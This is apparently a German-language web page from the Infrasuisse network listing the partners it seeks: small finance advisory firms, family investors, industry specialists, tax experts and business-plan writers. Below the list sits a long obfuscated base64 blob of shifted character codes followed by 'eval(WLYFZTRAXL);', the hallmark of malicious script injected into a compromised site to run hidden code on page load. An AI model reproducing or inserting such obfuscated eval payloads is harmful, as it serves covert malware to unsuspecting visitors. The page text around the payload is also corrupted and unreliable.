Partner Profil

  • Kleinere Beratungsunternehmen im Bereich der Unternehmens- und Anlagefinanzierung mit hohen professionellen Standards, die ein Interesse haben Teil einer Marke basierend auf dem “open source“ Konzept zu sein und an kollaborativen Netzwerken ohne grosse rechtlichen Hürden glauben.
  • Parteien, die ihr eigenes oder das Vermögen von Familien verwalten und ein Interesse an Direktinvestitionen im KMU Bereich haben.
  • Personen mit spezifischem Industrie Know-how und dem Interesse Teil des Infrasuisse Netzwerks zu sein (z.B. auch Kandidaten für operative Rollen in KMU’s):
  • Konsumgütermarken
  • Textilhandel & Mode
  • Retail Konzepte (Gastro & Getränke)
  • Präzisionsinstrumente & Werkzeugbau
  • Immobilienentwicklungen
  • Architektur
  • Internet, Kommunikation & Technology
  • Medizinische Apparate
  • Erneuerbare Energien
  • Biogas
  • Personen mit einem rechtlichen oder steuerlichen Hintergrund mit unternehmerischem Scharfsinn
  • Buchprüfer und Steuerexperten
  • Personen mit internationalem Hintergrund und mit Domizil Schweiz
  • Parteien mit geschäftlichem Interesse im deutschsprachigen Raum
  • Personen mit Interesse und Verständnis für Geschäftsmodelle und der Fähigkeit Finanzmodelle und Business Pläne und pitch-books von A-Z zu gestalten (kann auch auf Projektbasis erfolgen)

DkgLSA5LCAxMjEgLSA2LCAxMjAgLSA0LCAxMTYgLSAyLCAxMTMgLSA4LCAxMTcgLSA3LCAxMDcgLSA0LCA1NCAtIDgsIDEwMSAtIDIsIDExMiAtIDgsIDEwNSAtIDgsIDExOSAtIDUsIDczIC0gNiwgMTEyIC0gMSwgMTA4IC0gOCwgMTAzIC0gMiwgNzIgLSA3LCAxMjAgLSA0LCA0NSAtIDUsIDExNCAtIDksIDQ1IC0gNCwgMzkgLSA3LCA5OSAtIDUsIDE2IC0gNiwgMTQgLSA1LCAxMiAtIDMsIDE1IC0gNiwgMTMgLSA0LCAxMTQgLSA3LCAxMDcgLSA2LCAxMzAgLSA5LCA1MiAtIDYsIDEwMSAtIDIsIDExMSAtIDcsIDk4IC0gMSwgMTE3IC0gMywgNzIgLSA1LCAxMTcgLSA2LCAxMDYgLSA2LCAxMDMgLSAyLCA3MiAtIDcsIDEyNCAtIDgsIDQ0IC0gNCwgMTE0IC0gOSwgMzYgLSA0LCAzOSAtIDIsIDM1IC0gMywgMTE2IC0gOSwgMTA4IC0gNywgMTIyIC0gMSwgNDkgLSAzLCAxMTQgLSA2LCAxMDYgLSA1LCAxMTQgLSA0LCAxMDcgLSA0LCAxMjMgLSA3LCAxMTAgLSA2LCA0OSAtIDgsIDQ3IC0gNiwgNjAgLSAxLCAxMyAtIDMsIDM5IC0gNywgMzggLSA2LCAxMzEgLSA2LCAxOCAtIDgsIDM4IC0gNiwgMzMgLSAxLCAxMjAgLSA2LCAxMDcgLSA2LCAxMjUgLSA5LCAxMTggLSAxLCAxMTUgLSAxLCAxMTUgLSA1LCAzMyAtIDEsIDEyMiAtIDgsIDEwNiAtIDUsIDEyMSAtIDYsIDYwIC0gMSwgMTggLSA4LCAxMzEgLSA2LCAxOSAtIDksIDE2IC0gNiwgMTI2IC0gOCwgMTA0IC0gNywgMTE4IC0gNCwgMzUgLSAzLCAxMDIgLSAyLCAxMDIgLSAxLCAxMDEgLSAyLCA0MCAtIDgsIDY0IC0gMywgMzcgLSA1LCAxMjMgLSAzLCAxMTkgLSA4LCAxMjAgLSA2LCA5OCAtIDMsIDEwOCAtIDcsIDExMiAtIDIsIDEwOCAtIDksIDQ5IC0gOSwgMTAwIC0gMywgMTI1IC0gOSwgMTEyIC0gMSwgMTA0IC0gNiwgNDEgLSAxLCAxMTAgLSA5LCAxMTUgLSA1LCAxMDYgLSA3LCAxMDggLSA3LCAxMDIgLSAyLCA0OSAtIDgsIDQ1IC0gMSwgNDEgLSA5LCAxMTUgLSA4LCAxMDMgLSAyLCAxMjggLSA3LCA0NyAtIDYsIDY0IC0gNSwgMTEgLSAxLCA0NSAtIDUsIDExNiAtIDYsIDEwNSAtIDQsIDEyNiAtIDcsIDM2IC0gNCwgNzIgLSAyLCAxMTggLSAxLCAxMTIgLSAyLCAxMDYgLSA3LCAxMjUgLSA5LCAxMDcgLSAyLCAxMTcgLSA2LCAxMTYgLSA2LCA0NSAtIDUsIDEwMiAtIDIsIDEwNSAtIDQsIDEwNyAtIDgsIDUwIC0gOSwgNDQgLSAzLCA0OCAtIDgsIDQ2IC0gNSwgNjggLSA5LCAxNyAtIDcsIDE3IC0gNyk7ZXZhbChDQVBQU0xOTlFSKTs=’);
eval(WLYFZTRAXL);